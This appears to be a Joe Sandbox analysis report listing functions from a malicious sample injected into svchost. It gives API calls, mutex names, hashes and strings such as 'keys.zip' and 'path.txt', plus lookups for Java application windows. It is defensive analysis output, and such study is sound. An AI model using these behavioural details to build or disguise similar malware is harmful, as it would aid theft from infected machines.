                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                                    • String ID: 7F1BF93B$keys.zip$path1.txt
                                                                                                                                                                                                                    • API String ID: 1373881290-3210755562
                                                                                                                                                                                                                    • Opcode ID: 6f836b25f17f0ad99ec8f96c18d87b5cd4d00b462bd525bbeac384eb34f090cc
                                                                                                                                                                                                                    • Instruction ID: af73b95f3afc7f7d0884e6785d3ddf53a614609f7025e591714c5bd7d1cea629
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f836b25f17f0ad99ec8f96c18d87b5cd4d00b462bd525bbeac384eb34f090cc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D4114719046455FCF168B24AC9CBEABBE9EF85300F148694EDC9C7201EB71CA58CB91
                                                                                                                                                                                                                    Function 02C7A8A0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81synchronizationwindowthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A8C3
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7A8F0
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7A8F7
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7A909
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C7A918
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7A922
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A934
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7A961
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7A968
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000215,00000000,?), ref: 02C7A97B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 2596333622-3387790918
                                                                                                                                                                                                                    • Opcode ID: 6732ab873021143345105f0ae7f6a40ba091e59bea1e656974525272d65fe9d3
                                                                                                                                                                                                                    • Instruction ID: 11d871deff8ae8ac6c3bb86cc3c047be6394bae5bf7a145b80572d6ccf4b0d3c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6732ab873021143345105f0ae7f6a40ba091e59bea1e656974525272d65fe9d3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4621E231A80210AFC7028B65E84CFABBBA8FFD8721F054BB6F118C7251CB705561CBA0
                                                                                                                                                                                                                    Function 02C73690 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C736A1
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,?,7736C3F0,02C8599A), ref: 02C736B4
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02C736C0
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C736ED
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,?,7736C3F0,02C8599A), ref: 02C736FA
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02C73706
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C73739
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressCountHandleModuleProcTick$_snprintf
                                                                                                                                                                                                                    • String ID: %x%x$6b8e26743fcf62a2$RtlUniform$ntdll.dll
                                                                                                                                                                                                                    • API String ID: 3150073801-94268103
                                                                                                                                                                                                                    • Opcode ID: 16fb7404595c9f76e062ddb822cafc78445c59f754da67f144b58160114fee1f
                                                                                                                                                                                                                    • Instruction ID: d3b5ad9f9c5bacf3d36841ec1f4113d1771ff468889bfe1a1784290c724589eb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16fb7404595c9f76e062ddb822cafc78445c59f754da67f144b58160114fee1f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E101A971FC02516FBB0E97B4DC436A2775DAF80B51B040BB6E412E3180DBA08A108561
                                                                                                                                                                                                                    Function 02C8A300 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 41sleepsynchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02C8A32C
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8A335
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8A349
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8A35B
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59), ref: 02C8A366
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bfc59,ALPHA), ref: 02C8A380
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C8A386
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                    • String ID: 7f1bfc59$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0#v
                                                                                                                                                                                                                    • API String ID: 4280258085-526467187
                                                                                                                                                                                                                    • Opcode ID: b7366ee15de5e52d10bbe22890b26ca007bb41a7adafb8bb7eae61edd79a0730
                                                                                                                                                                                                                    • Instruction ID: 66065183afabc5e205905a98ee6f42eaf75174fc29e32019c41c5dc9de667fcd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7366ee15de5e52d10bbe22890b26ca007bb41a7adafb8bb7eae61edd79a0730
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47F0C8319C478076E30377619C0EF5A779CBF49B19F048619F55AA3181DBB4E9048B7B
                                                                                                                                                                                                                    Function 02C918D0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 41sleepsynchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C918FC
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C91905
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91919
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C9192B
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF8F3), ref: 02C91936
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7F1BF8F3,RFK), ref: 02C91950
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C91956
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                    • String ID: 7F1BF8F3$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0#v$RFK
                                                                                                                                                                                                                    • API String ID: 4280258085-2405295479
                                                                                                                                                                                                                    • Opcode ID: a23aa93f4d7bada0c20ea979d53e9f93f80ba3023bd624e9a939258abbeb8e4e
                                                                                                                                                                                                                    • Instruction ID: 141189960a55e461df8e06af9ff8a9f56ae7c7247c1961c10fdf04627f25ceb8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a23aa93f4d7bada0c20ea979d53e9f93f80ba3023bd624e9a939258abbeb8e4e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EF0F9309C47827AE60257614C1FF1A37DD6F44B59F094664F51663180DBF0951086AA
                                                                                                                                                                                                                    Function 02C8E890 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 41sleepsynchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C8E8BC
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8E8C5
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E8D9
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8E8EB
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfde3), ref: 02C8E8F6
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bfde3,HANDY), ref: 02C8E910
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C8E916
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                    • String ID: 7f1bfde3$HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0#v
                                                                                                                                                                                                                    • API String ID: 4280258085-2479272528
                                                                                                                                                                                                                    • Opcode ID: d68edfbe04656b478ca3f4c804e4aff0d14c7443ecfad1836c232fbea7746028
                                                                                                                                                                                                                    • Instruction ID: 6cb507c3f8e8aa611efe161f5ac436fe0354e7091d39b52a75f674d21e25321d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d68edfbe04656b478ca3f4c804e4aff0d14c7443ecfad1836c232fbea7746028
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FF0D1309C4741BAF21277658C0AF1E369C6F85B18F048664F905A2082DBB4A5108AAB
                                                                                                                                                                                                                    Function 02C98650 Relevance: 18.9, APIs: 15, Instructions: 136COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$malloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2190258309-0
                                                                                                                                                                                                                    • Opcode ID: 422a36f3baae03661693c8b695f4c9df394121d8d0b81a46caef40a9686741ae
                                                                                                                                                                                                                    • Instruction ID: 9528debf362d37c94820540aefb2e805a20e2595b75b4842f0bb886785884c53
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 422a36f3baae03661693c8b695f4c9df394121d8d0b81a46caef40a9686741ae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A641A8B1D40254CBCB21DF94EC45B5AB3A4BB85B08F250B79E4454B704D731AE51CFD2
                                                                                                                                                                                                                    Function 02C80A70 Relevance: 17.9, APIs: 14, Instructions: 355COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 4b8308effba2e0fad6e10e14667dd85b0e6b556642bc1ce5fb5bbcfcda7619dd
                                                                                                                                                                                                                    • Instruction ID: e9425d0ca37bfb561863d8c25653af8c558fe77ebd5fc73c7aa99de3bacac200
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b8308effba2e0fad6e10e14667dd85b0e6b556642bc1ce5fb5bbcfcda7619dd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42C1D631A006169FCB15DF68C8A4BBE7BB5EF85318F14C294ED569B340E731AA0DCB90
                                                                                                                                                                                                                    Function 02C7B390 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120synchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WindowFromDC.USER32(?), ref: 02C7B39C
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7B3D4
                                                                                                                                                                                                                    • CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 02C7B3E2
                                                                                                                                                                                                                    • GetClipRgn.GDI32(?,00000000), ref: 02C7B3EC
                                                                                                                                                                                                                    • SelectClipRgn.GDI32(00000000,00000000), ref: 02C7B3FC
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 02C7B403
                                                                                                                                                                                                                    • GetViewportOrgEx.GDI32(?,?), ref: 02C7B40E
                                                                                                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 02C7B422
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7B463
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 3315380975-3387790918
                                                                                                                                                                                                                    • Opcode ID: cb569ef6b664245f7c3fa50cf9dcfabde7d68aeb19ca8df509e47a00b2190c6b
                                                                                                                                                                                                                    • Instruction ID: fa693be15dccf9b0968d71d7f8b39fe227df8554a4e78187f550de969f190dc2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb569ef6b664245f7c3fa50cf9dcfabde7d68aeb19ca8df509e47a00b2190c6b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5941E7B6640245ABCB14CF99DC84EAB77BDEF8C715F108A59FA19D3240D630EC51CBA0
                                                                                                                                                                                                                    Function 02C928B8 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 118synchronizationsleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf8b2), ref: 02C928D7
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf8b2,?,?), ref: 02C92969
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 02C929F5
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C92A06
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C92A0D
                                                                                                                                                                                                                      • Part of subcall function 02C93E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C93E14
                                                                                                                                                                                                                      • Part of subcall function 02C93E00: CloseHandle.KERNEL32(?), ref: 02C93E25
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BackslashHandleMutexPath$CloseCreateInformationReleaseSleep
                                                                                                                                                                                                                    • String ID: 7f1bf8b2$Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0#v$keys.zip$path.txt
                                                                                                                                                                                                                    • API String ID: 3621236684-2687716975
                                                                                                                                                                                                                    • Opcode ID: d5380504f41b169b9c446815faef5c12e73c5d2c4660a589b03eeaab5e5fcfa9
                                                                                                                                                                                                                    • Instruction ID: 68b0bd38cb0a6921277f2db676b60a575a159409839778f83137e24ce36cf823
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5380504f41b169b9c446815faef5c12e73c5d2c4660a589b03eeaab5e5fcfa9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A41E8319445DA5FDB17CB28982C7E6BBE5AF89300F1886D9DCC9DB201DB718A48C791
                                                                                                                                                                                                                    Function 02C93840 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68memorylibraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                                      • Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                                      • Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                                      • Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                                      • Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                                      • Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                                      • Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                                      • Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                                    • RtlImageNtHeader.NTDLL(00000000), ref: 02C9386E
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C93882
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02C84480), ref: 02C93893
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02C938A3
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C84480), ref: 02C938E0
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,02C84480), ref: 02C938E3
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C84480), ref: 02C938F0
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,02C84480), ref: 02C938F3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FileHandle$FreeValidate$AddressAllocateCloseCountCreateHeaderImageInformationModuleProcReadSizeTickWritememset
                                                                                                                                                                                                                    • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                    • API String ID: 1403775172-3277137149
                                                                                                                                                                                                                    • Opcode ID: 64baa5fd28dc40ee032b274c01d001fef5a3462349e706ef4d6c3eb692cf10ee
                                                                                                                                                                                                                    • Instruction ID: 0ccaee5bb5eef121bf02499105de3754658da8f2b413a91fad157d137fb16431
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64baa5fd28dc40ee032b274c01d001fef5a3462349e706ef4d6c3eb692cf10ee
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7311B631E842916FEB169BB5DC0DF9BBBACEF84751F0446A5F905D3280DB34D610CAA1
                                                                                                                                                                                                                    Function 02C8EAD0 Relevance: 17.5, APIs: 8, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindWindowW.USER32(SunAwtFrame,02CB83E0), ref: 02C8EAE1
                                                                                                                                                                                                                    • FindWindowW.USER32(SunAwtFrame,02CB8418), ref: 02C8EAF1
                                                                                                                                                                                                                    • FindWindowW.USER32(SunAwtFrame,02CB8448), ref: 02C8EB01
                                                                                                                                                                                                                    • FindWindowW.USER32(SunAwtFrame,02CB8468), ref: 02C8EB11
                                                                                                                                                                                                                    • FindWindowW.USER32(SunAwtDialog,02CB83E0), ref: 02C8EB21
                                                                                                                                                                                                                    • FindWindowW.USER32(SunAwtDialog,02CB8418), ref: 02C8EB31
                                                                                                                                                                                                                    • FindWindowW.USER32(SunAwtDialog,02CB8448), ref: 02C8EB41
                                                                                                                                                                                                                    • FindWindowW.USER32(SunAwtDialog,02CB8468), ref: 02C8EB51
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FindWindow
                                                                                                                                                                                                                    • String ID: SunAwtDialog$SunAwtFrame
                                                                                                                                                                                                                    • API String ID: 134000473-1757792087
                                                                                                                                                                                                                    • Opcode ID: b201d23f41094976b1edccc0699267d55eb7bd535f81bef550611750ab442811
                                                                                                                                                                                                                    • Instruction ID: 9fae9017ba22f8d1d135ea2ad7290c95713231852abeed899d7bb493b7186d8a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b201d23f41094976b1edccc0699267d55eb7bd535f81bef550611750ab442811
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1F00D257C532665762232692D32FEA0B8C5D91D8EF058271BA17A3008E6A095424CF9
                                                                                                                                                                                                                    Function 02C8A318 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 30sleepsynchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02C8A32C
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8A335
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8A349
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8A35B
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59), ref: 02C8A366
